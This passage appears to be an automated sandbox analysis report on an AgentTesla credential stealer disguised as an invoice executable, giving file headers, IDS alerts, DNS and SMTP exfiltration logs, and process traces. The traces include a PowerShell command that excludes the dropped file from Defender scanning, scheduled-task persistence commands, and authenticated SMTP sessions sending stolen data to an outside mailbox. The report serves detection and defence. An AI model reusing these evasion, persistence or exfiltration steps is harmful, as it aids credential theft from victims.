                                          Time Stamp:0x64701883 [Fri May 26 02:25:07 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa906c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x2034.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa7b740x54.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa70c40xa7200False0.9075968820119671data7.762983884529855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xaa0000x20340x2200False0.8100873161764706data7.232131154050627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xae0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0xaa1000x1ac1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                          RT_GROUP_ICON0xabbd40x14data
                                          RT_VERSION0xabbf80x23cdata
                                          RT_MANIFEST0xabe440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          192.168.2.35.100.152.24496975872839723 05/26/23-11:30:19.875830TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872839723 05/26/23-11:30:38.087396TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872030171 05/26/23-11:30:19.875830TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872851779 05/26/23-11:30:38.087497TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872840032 05/26/23-11:30:19.875984TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872840032 05/26/23-11:30:38.087497TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872851779 05/26/23-11:30:19.875984TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872030171 05/26/23-11:30:38.087396TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49698587192.168.2.35.100.152.24

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 26, 2023 11:30:19.235784054 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.264534950 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.265422106 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.492854118 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.493402958 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.522346020 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.524163961 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.553760052 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.554203987 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.623383045 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.733593941 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.734699011 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.764144897 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.764169931 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.764425993 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.836429119 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.844118118 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.844368935 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.874149084 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.874423027 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.875829935 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.875983953 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.876035929 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.876096964 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.906063080 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.910511017 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:20.000235081 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.596210957 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.624862909 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.625017881 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.843923092 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.844399929 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.873491049 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.875005007 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.904480934 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.904998064 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.935765028 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.936095953 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.964807034 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.968437910 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.037228107 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.054229975 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.055352926 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.083884954 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.084300041 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.087395906 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087496996 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087590933 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087728024 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.116472006 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.116847038 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.121530056 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.277170897 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.308639050 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.379339933 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:31:59.540105104 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:31:59.540402889 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.543262005 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.571962118 CEST587496975.100.152.24192.168.2.3

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 26, 2023 11:30:19.081937075 CEST5238753192.168.2.38.8.8.8
                                          May 26, 2023 11:30:19.131423950 CEST53523878.8.8.8192.168.2.3
                                          May 26, 2023 11:30:19.144532919 CEST5692453192.168.2.38.8.8.8
                                          May 26, 2023 11:30:19.203860044 CEST53569248.8.8.8192.168.2.3
                                          May 26, 2023 11:30:37.406291962 CEST6062553192.168.2.38.8.8.8
                                          May 26, 2023 11:30:37.434777975 CEST53606258.8.8.8192.168.2.3
                                          May 26, 2023 11:30:37.544591904 CEST4930253192.168.2.38.8.8.8
                                          May 26, 2023 11:30:37.571331978 CEST53493028.8.8.8192.168.2.3

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 26, 2023 11:30:19.081937075 CEST192.168.2.38.8.8.80x835dStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:19.144532919 CEST192.168.2.38.8.8.80x7714Standard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.406291962 CEST192.168.2.38.8.8.80x539dStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.544591904 CEST192.168.2.38.8.8.80xe6ddStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 26, 2023 11:30:19.131423950 CEST8.8.8.8192.168.2.30x835dNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:19.131423950 CEST8.8.8.8192.168.2.30x835dNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:19.203860044 CEST8.8.8.8192.168.2.30x7714No error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:19.203860044 CEST8.8.8.8192.168.2.30x7714No error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.434777975 CEST8.8.8.8192.168.2.30x539dNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:37.434777975 CEST8.8.8.8192.168.2.30x539dNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.571331978 CEST8.8.8.8192.168.2.30xe6ddNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:37.571331978 CEST8.8.8.8192.168.2.30xe6ddNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false

                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          May 26, 2023 11:30:19.492854118 CEST587496975.100.152.24192.168.2.3220-cp-uk-1.webhostbox.net ESMTP Exim 4.95 #2 Fri, 26 May 2023 09:30:19 +0000
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          May 26, 2023 11:30:19.493402958 CEST49697587192.168.2.35.100.152.24EHLO 675052
                                          May 26, 2023 11:30:19.522346020 CEST587496975.100.152.24192.168.2.3250-cp-uk-1.webhostbox.net Hello 675052 [84.17.52.45]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPE_CONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          May 26, 2023 11:30:19.524163961 CEST49697587192.168.2.35.100.152.24AUTH login cWNsYWJAZ2ltcGV4LWltZXJ5cy5jb20=
                                          May 26, 2023 11:30:19.553760052 CEST587496975.100.152.24192.168.2.3334 UGFzc3dvcmQ6
                                          May 26, 2023 11:30:19.733593941 CEST587496975.100.152.24192.168.2.3235 Authentication succeeded
                                          May 26, 2023 11:30:19.734699011 CEST49697587192.168.2.35.100.152.24MAIL FROM:<qclab@gimpex-imerys.com>
                                          May 26, 2023 11:30:19.764169931 CEST587496975.100.152.24192.168.2.3250 OK
                                          May 26, 2023 11:30:19.764425993 CEST49697587192.168.2.35.100.152.24RCPT TO:<obtxxxtf@gmail.com>
                                          May 26, 2023 11:30:19.844118118 CEST587496975.100.152.24192.168.2.3250 Accepted
                                          May 26, 2023 11:30:19.844368935 CEST49697587192.168.2.35.100.152.24DATA
                                          May 26, 2023 11:30:19.874423027 CEST587496975.100.152.24192.168.2.3354 Enter message, ending with "." on a line by itself
                                          May 26, 2023 11:30:19.876096964 CEST49697587192.168.2.35.100.152.24.
                                          May 26, 2023 11:30:19.910511017 CEST587496975.100.152.24192.168.2.3250 OK id=1q2Tm7-003Omm-RL
                                          May 26, 2023 11:30:37.843923092 CEST587496985.100.152.24192.168.2.3220-cp-uk-1.webhostbox.net ESMTP Exim 4.95 #2 Fri, 26 May 2023 09:30:37 +0000
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          May 26, 2023 11:30:37.844399929 CEST49698587192.168.2.35.100.152.24EHLO 675052
                                          May 26, 2023 11:30:37.873491049 CEST587496985.100.152.24192.168.2.3250-cp-uk-1.webhostbox.net Hello 675052 [84.17.52.45]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPE_CONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          May 26, 2023 11:30:37.875005007 CEST49698587192.168.2.35.100.152.24AUTH login cWNsYWJAZ2ltcGV4LWltZXJ5cy5jb20=
                                          May 26, 2023 11:30:37.904480934 CEST587496985.100.152.24192.168.2.3334 UGFzc3dvcmQ6
                                          May 26, 2023 11:30:37.935765028 CEST587496985.100.152.24192.168.2.3235 Authentication succeeded
                                          May 26, 2023 11:30:37.936095953 CEST49698587192.168.2.35.100.152.24MAIL FROM:<qclab@gimpex-imerys.com>
                                          May 26, 2023 11:30:37.964807034 CEST587496985.100.152.24192.168.2.3250 OK
                                          May 26, 2023 11:30:37.968437910 CEST49698587192.168.2.35.100.152.24RCPT TO:<obtxxxtf@gmail.com>
                                          May 26, 2023 11:30:38.054229975 CEST587496985.100.152.24192.168.2.3250 Accepted
                                          May 26, 2023 11:30:38.055352926 CEST49698587192.168.2.35.100.152.24DATA
                                          May 26, 2023 11:30:38.084300041 CEST587496985.100.152.24192.168.2.3354 Enter message, ending with "." on a line by itself
                                          May 26, 2023 11:30:38.087728024 CEST49698587192.168.2.35.100.152.24.
                                          May 26, 2023 11:30:38.121530056 CEST587496985.100.152.24192.168.2.3250 OK id=1q2TmQ-003OrY-1t
                                          May 26, 2023 11:31:59.308639050 CEST49697587192.168.2.35.100.152.24QUIT
                                          May 26, 2023 11:31:59.540105104 CEST587496975.100.152.24192.168.2.3221 cp-uk-1.webhostbox.net closing connection

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:11:29:56
                                          Start date:26/05/2023
                                          Path:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Imagebase:0xa70000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Target ID:1
                                          Start time:11:30:06
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0x110000
                                          File size:430592 bytes
                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Target ID:2
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:3
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                                          Imagebase:0x1340000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:4
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:5
                                          Start time:11:30:08
                                          Start date:26/05/2023
                                          Path:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0xf00000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 25%, ReversingLabs
                                          Reputation:low

                                          General

                                          Target ID:6
                                          Start time:11:30:09
                                          Start date:26/05/2023
                                          Path:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Imagebase:0xa80000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Target ID:10
                                          Start time:11:30:25
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                                          Imagebase:0x1340000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:11
                                          Start time:11:30:25
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:12
                                          Start time:11:30:27
                                          Start date:26/05/2023
                                          Path:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0x790000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:9.3%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:38
                                            Total number of Limit Nodes:2
                                            execution_graph 17203 a6d7a28 17204 a6d7bb3 17203->17204 17205 a6d7a4e 17203->17205 17205->17204 17208 a6d7ca8 PostMessageW 17205->17208 17210 a6d7ca0 PostMessageW 17205->17210 17209 a6d7d14 17208->17209 17209->17205 17211 a6d7d14 17210->17211 17211->17205 17212 5350098 17213 53500c5 17212->17213 17214 53500f7 17213->17214 17218 5350628 17213->17218 17223 5350605 17213->17223 17228 5350618 17213->17228 17220 535063c 17218->17220 17219 53506c8 17219->17214 17233 53506e0 17220->17233 17236 53506d8 17220->17236 17224 535060e 17223->17224 17226 53506e0 2 API calls 17224->17226 17227 53506d8 2 API calls 17224->17227 17225 53506c8 17225->17214 17226->17225 17227->17225 17230 535063c 17228->17230 17229 53506c8 17229->17214 17231 53506e0 2 API calls 17230->17231 17232 53506d8 2 API calls 17230->17232 17231->17229 17232->17229 17235 53506f1 17233->17235 17239 5351900 17233->17239 17235->17219 17237 53506f1 17236->17237 17238 5351900 2 API calls 17236->17238 17237->17219 17238->17237 17243 5351930 17239->17243 17247 5351920 17239->17247 17240 535191a 17240->17235 17244 5351972 17243->17244 17246 5351979 17243->17246 17245 53519ca CallWindowProcW 17244->17245 17244->17246 17245->17246 17246->17240 17248 5351972 17247->17248 17249 5351979 17247->17249 17248->17249 17250 53519ca CallWindowProcW 17248->17250 17249->17240 17250->17249

                                            Executed Functions

                                            Function 05356E10 Relevance: 32.8, Strings: 25, Instructions: 1586COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 5356e10-53570b3 call 5356040 call 5356848 call 5356858 call 5356868 call 5356040 call 5356878 call 5356848 call 5356040 call 5356868 call 5356040 call 5356868 call 5356878 * 2 73 53570b5-53570bb 0->73 74 53570cb-53570fb call 5356888 call 5356898 0->74 75 53570bd 73->75 76 53570bf-53570c1 73->76 81 5357157-5357306 call 53568b8 call 53568c8 * 2 74->81 82 53570fd-535713e call 53568a8 74->82 75->74 76->74 125 5357325-535733e 81->125 126 5357308-5357323 81->126 89 5357144-5357155 82->89 90 5358896-53588c8 82->90 89->81 89->82 94 53588cf-53588df 90->94 95 53588ca call 5356a80 90->95 95->94 129 5357355-53573e3 125->129 130 5357340-5357353 125->130 126->125 140 53573e9-5358895 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356938 call 5356948 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356968 * 6 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356938 call 5356948 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356938 call 5356948 call 53568d8 call 53568e8 call 5356988 call 53568f8 call 5356908 call 5356968 * 2 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356968 * 2 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356998 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53569a8 call 53569b8 * 2 call 53569c8 call 53569d8 call 5356a00 call 5356a10 call 5356968 * 4 call 5356a20 call 5356a30 call 5356a40 call 5356a50 call 5356a60 call 53568e8 call 5356a70 * 3 129->140 130->129
                                            Strings
                                            Memory Dump Source
